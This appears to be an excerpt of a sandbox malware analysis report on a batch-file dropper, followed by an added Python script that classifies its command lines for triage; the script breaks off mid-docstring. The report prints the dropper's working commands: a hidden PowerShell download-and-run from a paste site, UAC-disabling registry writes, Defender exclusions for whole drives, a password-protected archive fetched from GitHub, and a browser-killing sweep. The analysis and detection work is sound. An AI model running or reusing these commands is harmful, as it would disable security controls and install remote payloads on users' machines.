Source: powershell.exe, 00000004.00000002.1742423417.00000218DA391000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E422000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.dr; String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.17.dr, qmgr.db.17.dr; String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.17.dr, qmgr.db.17.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.17.dr, qmgr.db.17.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E422000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000004.00000002.1742423417.00000218DBC16000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1742423417.00000218DAFC2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1763771377.00000218EA546000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763771377.00000218EA403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E422000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.dr; String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.17.dr; String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000004.00000002.1742423417.00000218DBA10000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.1742423417.00000218DBA10000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000004.00000002.1742423417.00000218DAFC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1742423417.00000218DB9BC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://paste.fo
Source: powershell.exe, 00000004.00000002.1741498822.00000218D8804000.00000004.00000020.00020000.00000000.sdmp, NEW-DRAWING-SHEET.bat; String found in binary or memory: https://paste.fo/raw/a1af5a4d0301
Source: NEW-DRAWING-SHEET.bat; String found in binary or memory: https://raw.githubuserc
Source: NEW-DRAWING-SHEET.bat; String found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/7z2408-x64.exe&
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownHTTPS traffic detected: 172.67.144.225:443 -> 192.168.2.4:49730 version: TLS 1.2

          System Summary

          Source: DOC.zip.crdownload.11.dr | Zip Entry: encrypted
          Source: chromecache_113.23.dr | Zip Entry: encrypted
          Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
          Source: C:\Program Files\7-Zip\7z.exe | Process token adjusted: Security
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: classification engine | Classification label: mal100.evad.winBAT@93/40@5/6
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\Downloads\ae802c9a-b519-4f5d-a10e-e9bb8606f864.tmp
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
          Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\Startup
          Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" "
          Source: C:\Windows\System32\reg.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
          Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
          Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
          Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
          Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iexplore.exe")
          Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
          Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "safari.exe")
          Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
          Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe")
          Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "epic.exe")
          Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe")
          Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "tor.exe")
          Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CMD.exe")
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: NEW-DRAWING-SHEET.bat | Virustotal: Detection: 34%
          Source: NEW-DRAWING-SHEET.bat | ReversingLabs: Detection: 23%
          Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" "
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat'))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 9
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1980,i,6972678540709667438,18385464693239191531,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOC.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 9
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iexplore.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM safari.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epic.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM tor.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM CMD.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat'))"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 9
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOC.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 9
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iexplore.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM safari.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epic.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM tor.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM CMD.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1980,i,6972678540709667438,18385464693239191531,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
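          The process-creation entries above are the whole playbook of this dropper in plain command lines: a PowerShell WebClient download cradle run under an execution-policy override, a run of reg.exe writes zeroing UAC values under HKLM\...\Policies\System, Add-MpPreference exclusions for entire drives and the user's Temp and Downloads folders, a password-protected DOC.zip unpacked with 7-Zip, and a taskkill sweep over every common browser. The following triage script is an added example and not part of the Joe Sandbox report or of the sample itself. It runs process command lines through one rule per behaviour and produces a weighted verdict. The sample input is constructed from the command lines listed in this report (the 7-Zip password is replaced with a placeholder); the rule names, weights, thresholds and function names are this example's own choices, not anything defined by Joe Sandbox.

```python
"""Triage of Windows process-creation command lines for the behaviours this
report documents. Added example; rule names, weights and thresholds are this
example's own, and the SAMPLE lines are constructed from the report.
"""
import re
from collections import Counter

# UAC values whose zeroing removes or weakens the elevation prompt. Any other
# write under Policies\System is still reported, at a lower weight.
UAC_CRITICAL = {"enablelua", "consentpromptbehavioradmin", "consentpromptbehavioruser",
                "enableinstallerdetection", "enablesecureuiapaths"}
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe", "opera.exe",
            "safari.exe", "brave.exe", "vivaldi.exe", "epic.exe", "yandex.exe", "tor.exe"}
WEIGHTS = {"uac_disable": 30, "defender_exclusion": 20, "ps_download_cradle": 20,
           "browser_kill_spree": 15, "archive_pw_extract": 10, "ps_invoke_expression": 10,
           "uac_policy_write": 5, "ps_policy_override": 5}

RE_REG_ADD = re.compile(r"\breg(?:\.exe)?\s+add\s+(?P<key>\S+)\s+/v\s+(?P<value>\S+).*?/d\s+(?P<data>\S+)", re.I)
RE_MPPREF = re.compile(r"""Add-MpPreference\s+-ExclusionPath\s+(?P<path>'[^']*'|"[^"]*"|\$\w+)""", re.I)
RE_DOWNLOAD = re.compile(r"DownloadFile\(\s*'(?P<url>https?://[^']+)'", re.I)
RE_POLICY = re.compile(r"-(?:ExecutionPolicy|ep)\s+(?P<policy>\w+)", re.I)
RE_IEX = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)
RE_TASKKILL = re.compile(r"taskkill\s+/F\s+/IM\s+(?P<image>\S+)", re.I)
RE_SEVENZIP = re.compile(r"""7z(?:\.exe)?"?\s+x\s+"?(?P<archive>[^"\s]+)"?.*?\s-p(?P<pw>\S+)""", re.I)


def classify(cmdline):
    """Return [(rule, detail)] for every behaviour found in one command line."""
    hits = []
    m = RE_REG_ADD.search(cmdline)
    if m and "policies\\system" in m.group("key").lower():
        zeroed = m.group("value").lower() in UAC_CRITICAL and m.group("data") == "0"
        hits.append(("uac_disable" if zeroed else "uac_policy_write", m.group("value")))
    m = RE_MPPREF.search(cmdline)
    if m:  # the argument is reported as written; a single-quoted $env:... is not expanded by PowerShell
        hits.append(("defender_exclusion", m.group("path").strip("'\"")))
    if "powershell" in cmdline.lower():
        m = RE_DOWNLOAD.search(cmdline)
        if m:
            hits.append(("ps_download_cradle", m.group("url")))
        m = RE_POLICY.search(cmdline)
        if m:
            hits.append(("ps_policy_override", m.group("policy")))
        if RE_IEX.search(cmdline):
            hits.append(("ps_invoke_expression", "IEX"))
    m = RE_TASKKILL.search(cmdline)
    if m:
        hits.append(("taskkill", m.group("image").lower()))
    m = RE_SEVENZIP.search(cmdline)
    if m:
        hits.append(("archive_pw_extract", m.group("archive")))
    return hits


def triage(cmdlines, kill_threshold=3):
    """Aggregate per-line hits; a taskkill only counts once it becomes a sweep
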